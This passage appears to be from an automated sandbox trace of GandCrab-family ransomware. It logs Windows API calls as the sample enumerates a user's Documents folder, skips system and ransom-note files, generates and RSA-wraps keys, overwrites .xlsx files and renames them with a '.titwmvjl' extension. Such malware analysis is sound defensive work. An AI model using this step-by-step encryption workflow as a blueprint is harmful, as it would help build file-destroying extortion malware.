5\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0089.489] WriteFile (in: hFile=0x230, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f508, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f508*=0x2162, lpOverlapped=0x0) returned 1 [0089.489] CloseHandle (hObject=0x230) returned 1 [0089.489] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.489] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.490] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x22, wMilliseconds=0x322)) [0089.490] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.490] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0089.490] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0089.490] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\d2ca4a09d2ca4deb61a.lock") returned 56 [0089.490] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0089.491] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.491] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.491] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\") returned 32 [0089.491] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\*" [0089.491] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0x503578 [0089.491] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.491] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0089.491] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.491] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.491] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0089.491] lstrcmpW (lpString1="275UOAN6kkvFlZMLH.xlsx", lpString2=".") returned 1 [0089.491] lstrcmpW (lpString1="275UOAN6kkvFlZMLH.xlsx", lpString2="..") returned 1 [0089.491] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="275UOAN6kkvFlZMLH.xlsx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\275UOAN6kkvFlZMLH.xlsx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\275UOAN6kkvFlZMLH.xlsx" [0089.491] lstrlenW (lpString=".titwmvjl") returned 9 [0089.491] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\275UOAN6kkvFlZMLH.xlsx") returned 54 [0089.492] VirtualAlloc (lpAddress=0x0, dwSize=0xac, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.492] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\275UOAN6kkvFlZMLH.xlsx.titwmvjl") returned 63 [0089.492] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\275UOAN6kkvFlZMLH.xlsx") returned 54 [0089.492] lstrlenW (lpString=".xlsx") returned 5 [0089.492] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.492] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".xlsx ") returned 6 [0089.492] lstrcmpiW (lpString1=".xlsx", lpString2=".titwmvjl") returned 1 [0089.492] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.492] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\275UOAN6kkvFlZMLH.xlsx") returned 54 [0089.492] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\275UOAN6kkvFlZMLH.xlsx") returned 54 [0089.492] lstrcmpiW (lpString1="275UOAN6kkvFlZMLH.xlsx", lpString2="desktop.ini") returned -1 [0089.492] lstrcmpiW (lpString1="275UOAN6kkvFlZMLH.xlsx", lpString2="autorun.inf") returned -1 [0089.492] lstrcmpiW (lpString1="275UOAN6kkvFlZMLH.xlsx", lpString2="ntuser.dat") returned -1 [0089.492] lstrcmpiW (lpString1="275UOAN6kkvFlZMLH.xlsx", lpString2="iconcache.db") returned -1 [0089.492] lstrcmpiW (lpString1="275UOAN6kkvFlZMLH.xlsx", lpString2="bootsect.bak") returned -1 [0089.492] lstrcmpiW (lpString1="275UOAN6kkvFlZMLH.xlsx", lpString2="boot.ini") returned -1 [0089.492] lstrcmpiW (lpString1="275UOAN6kkvFlZMLH.xlsx", lpString2="ntuser.dat.log") returned -1 [0089.492] lstrcmpiW (lpString1="275UOAN6kkvFlZMLH.xlsx", lpString2="thumbs.db") returned -1 [0089.492] lstrcmpiW (lpString1="275UOAN6kkvFlZMLH.xlsx", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0089.492] lstrcmpiW (lpString1="275UOAN6kkvFlZMLH.xlsx", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0089.492] lstrcmpiW (lpString1="275UOAN6kkvFlZMLH.xlsx", lpString2="KRAB-DECRYPT.html") returned -1 [0089.492] lstrcmpiW (lpString1="275UOAN6kkvFlZMLH.xlsx", lpString2="CRAB-DECRYPT.html") returned -1 [0089.492] lstrcmpiW (lpString1="275UOAN6kkvFlZMLH.xlsx", lpString2="KRAB-DECRYPT.txt") returned -1 [0089.492] lstrcmpiW (lpString1="275UOAN6kkvFlZMLH.xlsx", lpString2="CRAB-DECRYPT.txt") returned -1 [0089.492] lstrcmpiW (lpString1="275UOAN6kkvFlZMLH.xlsx", lpString2="ntldr") returned -1 [0089.492] lstrcmpiW (lpString1="275UOAN6kkvFlZMLH.xlsx", lpString2="NTDETECT.COM") returned -1 [0089.492] lstrcmpiW (lpString1="275UOAN6kkvFlZMLH.xlsx", lpString2="Bootfont.bin") returned -1 [0089.493] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\275UOAN6kkvFlZMLH.xlsx") returned 54 [0089.493] lstrlenW (lpString=".xlsx") returned 5 [0089.493] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.493] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".xlsx ") returned 6 [0089.493] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.493] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.493] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\275UOAN6kkvFlZMLH.xlsx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\275uoan6kkvflzmlh.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0089.493] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.493] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0089.494] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.494] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.494] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0089.495] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.496] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.496] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.496] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0089.496] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.496] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.496] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.496] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.497] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0089.498] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.498] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.498] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.498] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0089.498] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.498] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.498] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.498] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.498] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0089.499] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.500] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5036f8) returned 1 [0089.500] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.500] CryptGetKeyParam (in: hKey=0x5036f8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0089.500] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.500] CryptEncrypt (in: hKey=0x5036f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0089.501] GetLastError () returned 0x0 [0089.501] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.501] CryptDestroyKey (hKey=0x5036f8) returned 1 [0089.501] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.501] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.501] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.501] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0089.502] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.502] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503838) returned 1 [0089.502] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.502] CryptGetKeyParam (in: hKey=0x503838, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0089.502] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.503] CryptEncrypt (in: hKey=0x503838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0089.503] GetLastError () returned 0x0 [0089.503] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.503] CryptDestroyKey (hKey=0x503838) returned 1 [0089.503] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.503] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.503] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0089.503] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0089.504] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0x11b39, lpOverlapped=0x0) returned 1 [0089.510] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffee4c7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.510] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x11b39, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0x11b39, lpOverlapped=0x0) returned 1 [0089.511] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0089.513] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.516] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.516] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.517] CloseHandle (hObject=0x2ac) returned 1 [0089.517] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\275UOAN6kkvFlZMLH.xlsx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\275uoan6kkvflzmlh.xlsx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\275UOAN6kkvFlZMLH.xlsx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\275uoan6kkvflzmlh.xlsx.titwmvjl"), dwFlags=0x1) returned 1 [0089.518] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.518] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0089.518] lstrcmpW (lpString1="5DbxKRWN.xlsx", lpString2=".") returned 1 [0089.518] lstrcmpW (lpString1="5DbxKRWN.xlsx", lpString2="..") returned 1 [0089.518] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="5DbxKRWN.xlsx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\5DbxKRWN.xlsx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\5DbxKRWN.xlsx" [0089.518] lstrlenW (lpString=".titwmvjl") returned 9 [0089.518] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\5DbxKRWN.xlsx") returned 45 [0089.518] VirtualAlloc (lpAddress=0x0, dwSize=0x9a, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.518] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\5DbxKRWN.xlsx.titwmvjl") returned 54 [0089.518] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\5DbxKRWN.xlsx") returned 45 [0089.518] lstrlenW (lpString=".xlsx") returned 5 [0089.518] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.518] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".xlsx ") returned 6 [0089.518] lstrcmpiW (lpString1=".xlsx", lpString2=".titwmvjl") returned 1 [0089.518] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.519] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\5DbxKRWN.xlsx") returned 45 [0089.519] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\5DbxKRWN.xlsx") returned 45 [0089.519] lstrcmpiW (lpString1="5DbxKRWN.xlsx", lpString2="desktop.ini") returned -1 [0089.519] lstrcmpiW (lpString1="5DbxKRWN.xlsx", lpString2="autorun.inf") returned -1 [0089.519] lstrcmpiW (lpString1="5DbxKRWN.xlsx", lpString2="ntuser.dat") returned -1 [0089.519] lstrcmpiW (lpString1="5DbxKRWN.xlsx", lpString2="iconcache.db") returned -1 [0089.519] lstrcmpiW (lpString1="5DbxKRWN.xlsx", lpString2="bootsect.bak") returned -1 [0089.519] lstrcmpiW (lpString1="5DbxKRWN.xlsx", lpString2="boot.ini") returned -1 [0089.519] lstrcmpiW (lpString1="5DbxKRWN.xlsx", lpString2="ntuser.dat.log") returned -1 [0089.519] lstrcmpiW (lpString1="5DbxKRWN.xlsx", lpString2="thumbs.db") returned -1 [0089.519] lstrcmpiW (lpString1="5DbxKRWN.xlsx", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0089.519] lstrcmpiW (lpString1="5DbxKRWN.xlsx", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0089.519] lstrcmpiW (lpString1="5DbxKRWN.xlsx", lpString2="KRAB-DECRYPT.html") returned -1 [0089.519] lstrcmpiW (lpString1="5DbxKRWN.xlsx", lpString2="CRAB-DECRYPT.html") returned -1 [0089.519] lstrcmpiW (lpString1="5DbxKRWN.xlsx", lpString2="KRAB-DECRYPT.txt") returned -1 [0089.519] lstrcmpiW (lpString1="5DbxKRWN.xlsx", lpString2="CRAB-DECRYPT.txt") returned -1 [0089.519] lstrcmpiW (lpString1="5DbxKRWN.xlsx", lpString2="ntldr") returned -1 [0089.519] lstrcmpiW (lpString1="5DbxKRWN.xlsx", lpString2="NTDETECT.COM") returned -1 [0089.519] lstrcmpiW (lpString1="5DbxKRWN.xlsx", lpString2="Bootfont.bin") returned -1 [0089.519] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\5DbxKRWN.xlsx") returned 45 [0089.519] lstrlenW (lpString=".xlsx") returned 5 [0089.519] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.519] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".xlsx ") returned 6 [0089.519] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.519] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.520] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\5DbxKRWN.xlsx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\5dbxkrwn.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0089.520] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.520] ReadFile (in: hFile=0x2ac, 